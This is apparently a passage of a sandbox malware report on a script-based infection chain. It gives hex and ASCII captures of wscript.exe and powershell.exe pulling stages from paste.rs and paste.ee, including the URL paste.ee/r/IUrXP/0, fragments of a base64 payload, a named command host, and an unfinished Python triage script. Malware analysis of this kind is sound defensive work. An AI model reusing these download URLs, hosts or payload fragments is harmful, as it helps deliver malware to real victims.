                                                        Server: nginx
                                                        Date: Tue, 17 Dec 2024 13:30:06 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Content-Length: 79269
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        x-content-type-options: nosniff
                                                        permissions-policy: interest-cohort=()
                                                        x-frame-options: SAMEORIGIN
                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains;
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        2024-12-17 13:30:06 UTC15945INData Raw: 0d 0a 20 20 20 20 0d 0a 55 76 4c 67 53 47 65 4e 43 63 70 78 41 64 4a 20 3d 20 22 4c 78 42 66 4c 62 6d 47 5a 67 52 50 7a 62 4b 22 0d 0a 55 50 68 41 63 6d 4c 4c 69 62 6b 4b 47 5a 71 20 3d 20 22 57 64 43 49 4c 63 6b 72 4f 57 5a 57 51 5a 4e 22 0d 0a 57 4b 63 41 4a 4e 74 57 41 65 4f 47 6a 43 61 20 3d 20 22 68 6b 50 49 55 7a 62 72 57 5a 4b 6b 63 50 70 22 0d 0a 0d 0a 6f 65 78 42 4b 6f 47 70 63 4a 4e 68 50 57 66 20 3d 20 22 55 67 4b 63 4c 75 53 68 47 4f 4b 52 4c 64 57 22 0d 0a 65 4b 6b 65 47 69 74 4b 6d 50 63 47 47 4b 71 20 3d 20 22 6b 70 57 6d 4b 55 63 78 53 6b 4c 4c 57 57 50 22 0d 0a 5a 6d 41 63 4b 6f 47 69 53 69 55 4c 69 4b 7a 20 3d 20 22 5a 70 63 54 41 4c 4c 6d 4c 63 4c 73 4c 63 63 22 0d 0a 55 57 66 68 74 4c 4b 57 55 55 67 6f 50 71 7a 20 3d 20 22 62 54 70 6b
                                                        Data Ascii: UvLgSGeNCcpxAdJ = "LxBfLbmGZgRPzbK"UPhAcmLLibkKGZq = "WdCILckrOWZWQZN"WKcAJNtWAeOGjCa = "hkPIUzbrWZKkcPp"oexBKoGpcJNhPWf = "UgKcLuShGOKRLdW"eKkeGitKmPcGGKq = "kpWmKUcxSkLLWWP"ZmAcKoGiSiULiKz = "ZpcTALLmLcLsLcc"UWfhtLKWUUgoPqz = "bTpk
                                                        2024-12-17 13:30:06 UTC16384INData Raw: 20 22 6b 4e 69 4a 74 70 69 6d 6e 61 69 70 69 4b 55 22 0d 0a 4f 61 57 57 71 57 68 57 68 4c 4c 69 4c 57 6b 20 3d 20 22 4c 4e 5a 47 69 50 41 66 47 57 50 78 47 4b 72 22 0d 0a 42 64 75 70 57 55 55 4f 41 62 49 61 70 65 57 20 3d 20 22 57 57 4b 69 4c 74 4c 6c 50 4c 7a 4c 4c 6d 55 22 0d 0a 63 4c 66 57 61 65 4b 52 63 65 41 55 6b 67 75 20 3d 20 22 41 53 75 73 4c 57 4b 6f 7a 6f 69 53 6d 4f 61 22 0d 0a 52 52 66 62 72 6d 4c 4e 4c 4c 53 76 5a 4c 73 20 3d 20 22 62 57 76 68 6b 47 4b 7a 7a 52 4b 53 6d 64 69 22 0d 0a 0d 0a 69 6b 69 4e 68 68 5a 4c 4b 62 63 4b 57 41 4b 20 3d 20 22 62 76 4b 6f 6b 62 4c 4f 4c 48 57 57 4b 63 65 22 0d 0a 6b 4c 55 6b 52 4b 55 69 6f 69 4b 47 69 6b 57 20 3d 20 22 57 70 4b 6b 47 4c 63 6d 6f 55 70 68 69 63 4b 22 0d 0a 72 4c 6b 68 4c 74 61 66 51 43 72
                                                        Data Ascii: "kNiJtpimnaipiKU"OaWWqWhWhLLiLWk = "LNZGiPAfGWPxGKr"BdupWUUOAbIapeW = "WWKiLtLlPLzLLmU"cLfWaeKRceAUkgu = "ASusLWKozoiSmOa"RRfbrmLNLLSvZLs = "bWvhkGKzzRKSmdi"ikiNhhZLKbcKWAK = "bvKokbLOLHWWKce"kLUkRKUioiKGikW = "WpKkGLcmoUphicK"rLkhLtafQCr
                                                        2024-12-17 13:30:06 UTC16384INData Raw: 70 55 4a 62 72 70 6f 42 65 73 57 7a 52 20 3d 20 22 65 69 57 4c 6c 4b 4b 5a 4c 52 61 47 62 4f 4a 22 0d 0a 72 6f 6f 7a 75 74 52 47 68 6f 75 6d 66 4c 66 20 3d 20 22 6d 63 75 57 63 50 57 67 4b 4b 6d 69 52 7a 51 22 0d 0a 78 5a 43 6b 6d 52 4c 4c 70 55 4c 4b 69 42 4f 20 3d 20 22 61 6b 65 57 64 57 62 57 4b 71 7a 71 4c 4c 4b 22 0d 0a 50 70 43 52 50 4c 4c 4f 57 78 6b 69 55 4c 4c 20 3d 20 22 4c 6e 4e 51 4c 71 4c 63 4c 4b 47 6d 71 6b 63 22 0d 0a 0d 0a 6c 62 68 4c 66 69 71 6f 4c 64 57 4c 72 7a 41 20 3d 20 22 70 4b 69 6f 55 4c 62 6b 6e 4c 73 6d 69 62 4c 22 0d 0a 41 50 6b 6e 4c 4c 6d 4c 48 55 4c 52 52 4c 67 20 3d 20 22 57 54 43 4b 47 57 47 71 7a 4b 62 4c 50 55 51 22 0d 0a 47 53 69 7a 4a 65 4f 49 4c 4e 4c 78 47 4b 51 20 3d 20 22 6f 55 63 4f 65 4c 4b 55 6a 6c 47 7a 4f 47
                                                        Data Ascii: pUJbrpoBesWzR = "eiWLlKKZLRaGbOJ"roozutRGhoumfLf = "mcuWcPWgKKmiRzQ"xZCkmRLLpULKiBO = "akeWdWbWKqzqLLK"PpCRPLLOWxkiULL = "LnNQLqLcLKGmqkc"lbhLfiqoLdWLrzA = "pKioULbknLsmibL"APknLLmLHULRRLg = "WTCKGWGqzKbLPUQ"GSizJeOILNLxGKQ = "oUcOeLKUjlGzOG
                                                        2024-12-17 13:30:06 UTC16384INData Raw: 5a 55 69 70 7a 70 63 75 7a 6f 6e 69 6f 41 22 0d 0a 62 47 54 76 65 5a 68 57 62 61 5a 41 64 63 69 20 3d 20 22 55 6d 49 57 6e 43 73 57 42 57 6b 57 4b 4c 4c 22 0d 0a 70 52 4c 57 4c 6b 66 5a 64 50 75 4b 75 69 4c 20 3d 20 22 57 67 51 52 4b 5a 62 5a 65 4e 4b 57 4b 4a 57 22 0d 0a 0d 0a 76 41 71 4c 4f 63 78 62 66 78 50 6c 61 53 4a 20 3d 20 22 68 76 73 61 67 6e 6b 6e 57 69 48 4c 57 48 70 22 0d 0a 4b 75 62 66 7a 62 63 47 4c 50 6f 4c 42 55 73 20 3d 20 22 4c 69 66 62 55 65 69 54 62 47 41 69 57 74 63 22 0d 0a 6f 65 55 69 69 66 47 63 51 4c 57 4e 4b 74 47 20 3d 20 22 4c 4e 4c 6b 65 50 63 4b 4b 7a 69 6d 52 6b 6c 22 0d 0a 69 63 6f 68 47 51 55 51 41 48 63 47 76 42 5a 20 3d 20 22 61 4b 4b 4b 4c 57 65 6f 76 4f 41 53 65 62 4c 22 0d 0a 68 6e 71 72 55 71 78 71 61 42 63 51 61 57
                                                        Data Ascii: ZUipzpcuzonioA"bGTveZhWbaZAdci = "UmIWnCsWBWkWKLL"pRLWLkfZdPuKuiL = "WgQRKZbZeNKWKJW"vAqLOcxbfxPlaSJ = "hvsagnknWiHLWHp"KubfzbcGLPoLBUs = "LifbUeiTbGAiWtc"oeUiifGcQLWNKtG = "LNLkePcKKzimRkl"icohGQUQAHcGvBZ = "aKKKLWeovOASebL"hnqrUqxqaBcQaW
                                                        2024-12-17 13:30:06 UTC14172INData Raw: 0a 62 4c 61 47 6f 67 6c 57 78 6b 62 47 72 6b 72 20 3d 20 22 50 63 4c 6f 49 73 4f 6e 5a 66 4b 4c 4e 74 4f 22 0d 0a 69 47 41 6d 5a 53 54 57 4b 69 43 41 4c 57 42 20 3d 20 22 6d 63 62 6c 4c 67 71 75 4e 74 75 4b 6f 6f 64 22 0d 0a 0d 0a 73 6e 4b 4f 64 74 6d 71 4e 74 4b 43 50 6d 70 20 3d 20 22 4f 47 64 75 69 62 4c 69 47 73 66 4c 4c 63 65 22 0d 0a 61 78 6b 52 4b 64 65 55 4a 50 47 63 7a 63 65 20 3d 20 22 47 5a 4c 4b 47 66 57 73 4b 65 75 55 50 4b 53 22 0d 0a 6b 62 57 78 47 6f 4c 4b 42 57 55 4e 52 4c 4e 20 3d 20 22 62 66 42 47 7a 55 71 4b 69 74 7a 6a 50 74 42 22 0d 0a 4a 7a 42 55 78 4c 4c 5a 63 65 55 61 43 4c 6e 20 3d 20 22 71 63 68 5a 4c 65 47 6b 6f 42 47 41 5a 4c 42 22 0d 0a 69 57 4f 42 6f 4e 74 55 70 4c 4b 4b 4b 63 4c 20 3d 20 22 68 52 63 57 4c 55 4b 6f 48 57 57
                                                        Data Ascii: bLaGoglWxkbGrkr = "PcLoIsOnZfKLNtO"iGAmZSTWKiCALWB = "mcblLgquNtuKood"snKOdtmqNtKCPmp = "OGduibLiGsfLLce"axkRKdeUJPGczce = "GZLKGfWsKeuUPKS"kbWxGoLKBWUNRLN = "bfBGzUqKitzjPtB"JzBUxLLZceUaCLn = "qchZLeGkoBGAZLB"iWOBoNtUpLKKKcL = "hRcWLUKoHWW


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49784 | 104.21.84.67 | 443 | 3704 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 13:30:37 UTC | 67 | OUT | GET /r/IUrXP/0 HTTP/1.1
                                                        Host: paste.ee
                                                        Connection: Keep-Alive
2024-12-17 13:30:37 UTC | 1292 | IN | HTTP/1.1 200 OK
                                                        Date: Tue, 17 Dec 2024 13:30:37 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: max-age=2592000
                                                        strict-transport-security: max-age=63072000
                                                        x-frame-options: DENY
                                                        x-content-type-options: nosniff
                                                        x-xss-protection: 1; mode=block
                                                        content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                        CF-Cache-Status: HIT
                                                        Age: 24562
                                                        Last-Modified: Tue, 17 Dec 2024 06:41:15 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zj1HkdSjYuKocE28L1%2BvjiFcMRk%2Fmw5LWfj4PRF9wJdd0LxiH8Cx8rJvdg7v%2B0kFhaT%2FaSAgDTKA7XGIQxor1Na7s69eYAFRSb6%2FnbG4%2B2BKFtJXMuNRwuVLcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8f3744cfebc042c6-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-12-17 13:30:37 UTC215INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 38 31 33 26 6d 69 6e 5f 72 74 74 3d 31 38 31 32 26 72 74 74 5f 76 61 72 3d 36 38 33 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 35 39 38 32 34 38 26 63 77 6e 64 3d 31 34 39 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 62 34 61 63 35 63 64 64 63 34 31 35 61 38 36 35 26 74 73 3d 34 36 39 26 78 3d 30 22 0d 0a 0d 0a
                                                        Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1813&min_rtt=1812&rtt_var=683&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2816&recv_bytes=681&delivery_rate=1598248&cwnd=149&unsent_bytes=0&cid=b4ac5cddc415a865&ts=469&x=0"
                                                        2024-12-17 13:30:37 UTC1231INData Raw: 37 61 38 65 0d 0a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 2b 38 67 4e 50 38 79 44 6e 38 77 48 50 59 78 44 54 38 77 43 50 41 73 44 35 37 51 38 4f 6b 75 44 67 37 41 32 4f 38 73 44 48 36 41 76 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35
                                                        Data Ascii: 7a8eAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwD+8gNP8yDn8wHPYxDT8wCPAsD57Q8OkuDg7A2O8sDH6AvOMrDr6woOspDR6giOQoDC6QgOAkD/5
                                                        2024-12-17 13:30:37 UTC1369INData Raw: 67 45 4f 41 68 44 50 34 67 44 4f 6f 67 44 4a 34 51 78 4e 38 66 44 39 33 41 2f 4e 73 66 44 36 33 67 39 4e 55 66 44 78 33 77 36 4e 6b 65 44 6f 33 77 35 4e 59 65 44 69 33 51 34 4e 30 64 44 58 33 51 31 4e 51 64 44 54 33 77 7a 4e 34 63 44 4b 33 41 78 4e 49 63 44 42 33 41 67 4e 38 62 44 37 32 67 75 4e 59 62 44 77 32 67 72 4e 30 61 44 73 32 41 71 4e 63 61 44 6a 32 51 6e 4e 73 5a 44 61 32 67 6c 4e 55 5a 44 52 32 77 69 4e 6b 59 44 49 32 41 68 4e 4d 55 44 39 31 41 66 4e 73 58 44 36 31 41 5a 4e 49 57 44 68 41 41 51 41 6b 42 67 42 41 44 41 41 41 73 44 61 37 51 47 4d 77 41 41 41 41 41 42 41 47 41 4c 41 37 41 7a 4f 6f 6f 44 31 36 41 74 4f 41 72 44 6d 36 67 6e 4f 55 70 44 50 36 67 6a 4f 6f 6f 44 45 35 41 65 4f 49 6e 44 72 35 67 61 4f 49 6d 44 68 35 41 59 4f 38 42 41 41
                                                        Data Ascii: gEOAhDP4gDOogDJ4QxN8fD93A/NsfD63g9NUfDx3w6NkeDo3w5NYeDi3Q4N0dDX3Q1NQdDT3wzN4cDK3AxNIcDB3AgN8bD72guNYbDw2grN0aDs2AqNcaDj2QnNsZDa2glNUZDR2wiNkYDI2AhNMUD91AfNsXD61AZNIWDhAAQAkBgBADAAAsDa7QGMwAAAAABAGALA7AzOooD16AtOArDm6gnOUpDP6gjOooDE5AeOInDr5gaOImDh5AYO8BAA
                                                        2024-12-17 13:30:37 UTC1369INData Raw: 75 4f 6b 72 44 33 36 51 74 4f 4d 72 44 78 36 77 72 4f 30 71 44 72 36 51 71 4f 63 71 44 6c 36 77 6f 4f 45 71 44 66 36 51 6e 4f 73 70 44 5a 36 77 6c 4f 55 70 44 54 36 51 6b 4f 38 6f 44 4e 36 77 69 4f 6b 6f 44 48 36 51 68 4f 4d 6f 44 42 35 77 66 4f 30 6e 44 37 35 51 65 4f 63 6e 44 31 35 77 63 4f 45 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44 7a 34 51 4d 4f 38 69 44 74 34 77 4b 4f 6b 69 44 6e 34 51 4a 4f 4d 69 44 68 34 77 48 4f 30 68 44 62 34 51 47 4f 63 68 44 56 34 77 45 4f 45 68 44 50 34 51 44 4f 73 67 44 4a 34 77 42 4f 55 67 44 44 34 51 77 4e 38 66 44 39 33
                                                        Data Ascii: uOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93
                                                        2024-12-17 13:30:37 UTC1369INData Raw: 4e 49 59 44 41 31 67 66 4e 77 58 44 36 31 41 65 4e 59 58 44 30 31 67 63 4e 41 58 44 75 31 41 62 4e 6f 57 44 6f 31 67 5a 4e 51 57 44 69 31 41 59 4e 34 56 44 63 31 67 57 4e 67 56 44 57 31 41 56 4e 49 56 44 51 31 67 54 4e 77 55 44 4b 31 41 53 4e 59 55 44 45 31 67 51 4e 41 51 44 2b 30 41 50 4e 6f 54 44 34 30 67 4e 4e 51 54 44 79 30 41 4d 4e 34 53 44 73 30 67 4b 4e 67 53 44 6d 30 41 4a 4e 49 53 44 67 30 67 48 4e 77 52 44 61 30 41 47 4e 59 52 44 55 30 67 45 4e 41 52 44 4f 30 41 44 4e 6f 51 44 49 30 67 42 4e 51 51 44 43 30 41 77 4d 34 50 44 38 7a 67 2b 4d 67 50 44 32 7a 41 39 4d 49 50 44 77 7a 67 37 4d 77 4f 44 71 7a 41 36 4d 59 4f 44 6b 7a 67 34 4d 41 4f 44 65 7a 41 33 4d 6f 4e 44 59 7a 67 31 4d 51 4e 44 53 7a 41 30 4d 34 4d 44 4d 7a 67 79 4d 67 4d 44 47 7a 41
                                                        Data Ascii: NIYDA1gfNwXD61AeNYXD01gcNAXDu1AbNoWDo1gZNQWDi1AYN4VDc1gWNgVDW1AVNIVDQ1gTNwUDK1ASNYUDE1gQNAQD+0APNoTD40gNNQTDy0AMN4SDs0gKNgSDm0AJNISDg0gHNwRDa0AGNYRDU0gENARDO0ADNoQDI0gBNQQDC0AwM4PD8zg+MgPD2zA9MIPDwzg7MwODqzA6MYODkzg4MAODezA3MoNDYzg1MQNDSzA0M4MDMzgyMgMDGzA
                                                        2024-12-17 13:30:37 UTC1369INData Raw: 4d 71 44 68 36 77 6e 4f 30 70 44 62 36 51 6d 4f 63 70 44 56 36 77 6b 4f 45 70 44 50 36 51 6a 4f 73 6f 44 4a 36 77 68 4f 55 6f 44 44 36 51 51 4f 38 6e 44 39 35 77 65 4f 6b 6e 44 33 35 51 64 4f 4d 6e 44 78 35 77 62 4f 30 6d 44 72 35 51 61 4f 63 6d 44 6c 35 77 59 4f 45 6d 44 66 35 51 58 4f 73 6c 44 5a 35 77 56 4f 55 6c 44 54 35 51 55 4f 38 6b 44 4e 35 77 53 4f 6b 6b 44 48 35 51 52 4f 4d 6b 44 42 34 77 50 4f 30 6a 44 37 34 51 4f 4f 63 6a 44 31 34 77 4d 4f 45 6a 44 76 34 51 4c 4f 45 68 44 51 34 77 44 4f 34 67 44 4e 34 41 44 4f 73 67 44 4b 34 51 43 4f 67 67 44 48 34 67 42 4f 55 67 44 45 34 41 77 4e 38 66 44 2b 33 51 2f 4e 77 66 44 37 33 67 2b 4e 6b 66 44 34 33 77 39 4e 59 66 44 31 33 41 38 4e 38 65 44 75 33 51 37 4e 77 65 44 72 33 67 36 4e 6b 65 44 6f 33 77 35
                                                        Data Ascii: MqDh6wnO0pDb6QmOcpDV6wkOEpDP6QjOsoDJ6whOUoDD6QQO8nD95weOknD35QdOMnDx5wbO0mDr5QaOcmDl5wYOEmDf5QXOslDZ5wVOUlDT5QUO8kDN5wSOkkDH5QROMkDB4wPO0jD74QOOcjD14wMOEjDv4QLOEhDQ4wDO4gDN4ADOsgDK4QCOggDH4gBOUgDE4AwN8fD+3Q/NwfD73g+NkfD43w9NYfD13A8N8eDu3Q7NweDr3g6NkeDo3w5
                                                        2024-12-17 13:30:37 UTC1369INData Raw: 41 6a 78 41 41 41 41 49 42 51 42 51 41 41 41 41 38 54 30 2f 45 68 50 41 37 6a 64 2b 73 69 50 69 30 6a 74 39 30 61 50 77 30 7a 4a 38 51 4b 50 61 74 7a 59 36 4d 76 4f 2b 6d 6a 7a 35 73 62 4f 7a 67 54 2f 34 6b 53 4e 2f 51 54 35 30 51 33 4d 4e 4f 44 62 79 51 76 4d 54 4c 54 76 79 51 6f 4d 65 45 7a 37 78 55 63 4d 63 42 44 68 77 63 44 41 41 41 41 55 41 55 41 41 41 38 54 76 2f 73 36 50 69 34 44 33 39 4d 74 4f 57 6f 6a 44 36 59 51 4f 2b 6e 7a 39 34 49 7a 4e 32 66 44 35 33 49 39 4e 41 66 6a 72 32 6b 50 4e 51 4d 54 30 7a 38 37 4d 74 4f 7a 6d 7a 6b 34 4d 33 4e 54 5a 7a 4d 31 4d 42 4e 7a 4c 7a 30 78 4d 4c 49 54 2b 79 55 72 4d 68 4b 54 55 79 6f 6b 4d 50 45 54 2b 78 63 63 4d 37 47 44 6a 78 38 58 4d 42 46 44 49 78 59 52 4d 44 41 54 32 77 41 4e 4d 4a 44 7a 68 77 41 49 4d
                                                        Data Ascii: AjxAAAAIBQBQAAAA8T0/EhPA7jd+siPi0jt90aPw0zJ8QKPatzY6MvO+mjz5sbOzgT/4kSN/QT50Q3MNODbyQvMTLTvyQoMeEz7xUcMcBDhwcDAAAAUAUAAA8Tv/s6Pi4D39MtOWojD6YQO+nz94IzN2fD53I9NAfjr2kPNQMT0z87MtOzmzk4M3NTZzM1MBNzLz0xMLIT+yUrMhKTUyokMPET+xccM7GDjx8XMBFDIxYRMDAT2wANMJDzhwAIM
                                                        2024-12-17 13:30:37 UTC1369INData Raw: 6a 5a 33 6b 30 4e 44 5a 54 47 30 30 78 4d 4e 4e 6a 4c 7a 77 67 4d 65 4b 44 66 79 77 6d 4d 58 4a 54 54 78 77 61 4d 58 47 6a 6a 78 45 59 4d 32 46 44 49 78 67 42 4d 7a 44 7a 36 77 30 4c 4d 32 43 54 70 77 73 4a 4d 52 43 6a 69 77 73 48 4d 31 42 6a 62 77 4d 47 41 41 41 41 64 41 51 41 67 41 41 41 41 2b 63 75 50 63 37 44 66 2b 51 69 50 65 34 44 47 2b 55 51 50 33 33 7a 37 39 67 64 50 4f 33 7a 77 39 30 62 50 34 32 7a 6b 39 6f 59 50 6d 31 6a 58 39 38 52 50 58 77 6a 31 38 73 4d 50 34 78 6a 63 38 73 41 50 44 73 54 39 37 30 2b 4f 6b 76 7a 32 37 4d 39 4f 4c 76 7a 77 37 67 37 4f 6d 75 6a 6e 37 49 35 4f 4b 75 54 67 37 67 33 4f 77 74 44 61 37 41 32 4f 59 74 7a 53 37 38 7a 4f 33 6f 54 2b 36 30 73 4f 68 71 6a 65 36 51 6e 4f 75 70 44 61 36 41 6d 4f 63 70 54 55 36 49 6b 4f 32
                                                        Data Ascii: jZ3k0NDZTG00xMNNjLzwgMeKDfywmMXJTTxwaMXGjjxEYM2FDIxgBMzDz6w0LM2CTpwsJMRCjiwsHM1BjbwMGAAAAdAQAgAAAA+cuPc7Df+QiPe4DG+UQP33z79gdPO3zw90bP42zk9oYPm1jX98RPXwj18sMP4xjc8sAPDsT970+Okvz27M9OLvzw7g7Omujn7I5OKuTg7g3OwtDa7A2OYtzS78zO3oT+60sOhqje6QnOupDa6AmOcpTU6IkO2
                                                        2024-12-17 13:30:37 UTC1369INData Raw: 6b 30 30 48 4e 75 52 6a 50 30 49 43 4e 50 4d 44 36 7a 49 74 4d 65 4b 54 62 79 49 6d 4d 48 4a 7a 49 79 63 51 4d 31 44 7a 7a 77 45 4c 4d 54 43 6a 54 41 41 41 41 30 43 41 42 67 41 41 41 41 38 44 5a 2f 63 31 50 48 39 6a 4f 2b 49 6f 50 43 35 44 4d 2b 4d 69 50 59 30 44 39 39 51 63 50 33 32 54 6e 39 49 44 50 79 76 7a 54 37 6f 54 4f 39 67 44 33 34 49 46 4f 49 63 7a 38 33 6b 35 4e 47 5a 54 4f 31 73 56 4e 34 55 44 43 7a 63 50 41 41 41 41 52 41 51 41 45 41 41 41 41 34 4d 65 4e 56 57 44 65 31 59 43 4e 41 50 44 71 79 73 75 4d 79 4b 44 6a 79 41 56 4d 7a 42 54 67 77 41 46 41 41 41 41 4a 41 51 41 41 41 38 6a 73 2f 30 32 50 36 34 44 36 2b 73 72 50 4f 32 44 33 39 63 43 50 33 76 6a 70 37 38 31 4f 45 6f 6a 39 34 34 37 4e 79 62 54 58 7a 6b 38 4d 35 4d 7a 45 79 59 76 4d 45 45
                                                        Data Ascii: k00HNuRjP0ICNPMD6zItMeKTbyImMHJzIycQM1DzzwELMTCjTAAAA0CABgAAAA8DZ/c1PH9jO+IoPC5DM+MiPY0D99QcP32Tn9IDPyvzT7oTO9gD34IFOIcz83k5NGZTO1sVN4UDCzcPAAAARAQAEAAAA4MeNVWDe1YCNAPDqysuMyKDjyAVMzBTgwAFAAAAJAQAAA8js/02P64D6+srPO2D39cCP3vjp781OEoj9447NybTXzk8M5MzEyYvMEE
                                                        2024-12-17 13:30:37 UTC1369INData Raw: 77 67 4e 4d 53 44 44 78 77 38 4c 4d 35 43 7a 73 77 30 4b 4d 6f 43 6a 6f 77 77 4a 4d 57 43 54 6b 77 73 49 4d 46 43 7a 66 77 6f 48 4d 30 42 6a 62 77 67 47 4d 6a 42 54 58 77 63 46 4d 52 42 44 54 77 59 45 4d 41 42 6a 4f 77 55 44 4d 76 41 54 4b 77 4d 43 4d 65 41 44 47 77 49 42 4d 4d 41 7a 42 77 45 41 41 41 41 41 31 41 4d 41 55 41 41 41 41 2f 73 2f 50 31 2f 44 38 2f 6f 2b 50 6b 2f 6a 33 2f 6b 39 50 54 2f 54 7a 2f 63 38 50 43 2f 44 76 2f 59 37 50 77 2b 7a 71 2f 55 36 50 66 2b 54 6d 2f 51 35 50 4f 2b 44 69 2f 49 34 50 39 39 7a 64 2f 45 33 50 72 39 6a 5a 2f 41 32 50 61 39 44 56 2f 38 30 50 4a 39 7a 51 2f 30 7a 50 34 38 6a 4d 2f 77 79 50 6d 38 54 49 2f 73 78 50 56 38 7a 44 2f 6f 77 50 45 34 6a 2f 2b 67 76 50 7a 37 54 37 2b 63 75 50 68 37 44 33 2b 59 74 50 51 37 6a
                                                        Data Ascii: wgNMSDDxw8LM5Czsw0KMoCjowwJMWCTkwsIMFCzfwoHM0BjbwgGMjBTXwcFMRBDTwYEMABjOwUDMvATKwMCMeADGwIBMMAzBwEAAAAA1AMAUAAAA/s/P1/D8/o+Pk/j3/k9PT/Tz/c8PC/Dv/Y7Pw+zq/U6Pf+Tm/Q5PO+Di/I4P99zd/E3Pr9jZ/A2Pa9DV/80PJ9zQ/0zP48jM/wyPm8TI/sxPV8zD/owPE4j/+gvPz7T7+cuPh7D3+YtPQ7j
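
The sessions above show the three distinct network behaviours of this chain: wscript.exe pulling a second-stage script from paste.rs (twice, from two PIDs, the same 79269-byte text/plain body made of junk VBScript variable assignments), powershell.exe pulling a chunked response from paste.ee whose body opens with a long run of "A" characters (consistent with base64-encoded zero bytes) using a bare request that carries no User-Agent header at all, and the injected aspnet_compiler.exe asking geoplugin.net for the victim's geolocation over plain HTTP. rem.pushswroller.eu is resolved in the DNS table but appears in no HTTP session here. The following Python is an added triage example, not part of the Joe Sandbox report: it joins the report's DNS answers to the per-process session rows (both embedded in the block as constructed input copied by hand from the tables above), flags script interpreters talking to paste services and any network activity from a .NET utility that should never have any, and classifies the two captured request shapes by their header fingerprint. The host lists (PASTE_SERVICES, SCRIPT_HOSTS, INJECTION_TARGETS) and the User-Agent heuristics are analyst assumptions that go beyond what the report states; geoplugin.net itself is a legitimate service, so the signal there is the requesting process, not the domain.

```python
"""Triage helper for the network section of a sandbox report: join DNS answers
to per-process HTTP sessions and flag the pairings worth escalating.
Added example, not part of the Joe Sandbox report."""
from collections import defaultdict

# Constructed input: rows copied by hand from the report's DNS-answer and
# session tables ("name ip" and "id src sport dst dport pid image").
DNS_ANSWERS = """\
paste.rs 45.63.94.214
paste.ee 104.21.84.67
paste.ee 172.67.187.200
rem.pushswroller.eu 45.80.158.30
geoplugin.net 178.237.33.50
"""

SESSIONS = r"""
0 192.168.2.6 49803 178.237.33.50 80 7924 C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
0 192.168.2.6 49713 45.63.94.214 443 3556 C:\Windows\System32\wscript.exe
1 192.168.2.6 49784 104.21.84.67 443 3704 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2 192.168.2.6 49790 45.63.94.214 443 7864 C:\Windows\System32\wscript.exe
3 192.168.2.6 49880 104.21.84.67 443 7972 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"""

# Analyst-maintained lists; assumptions, not something the report states.
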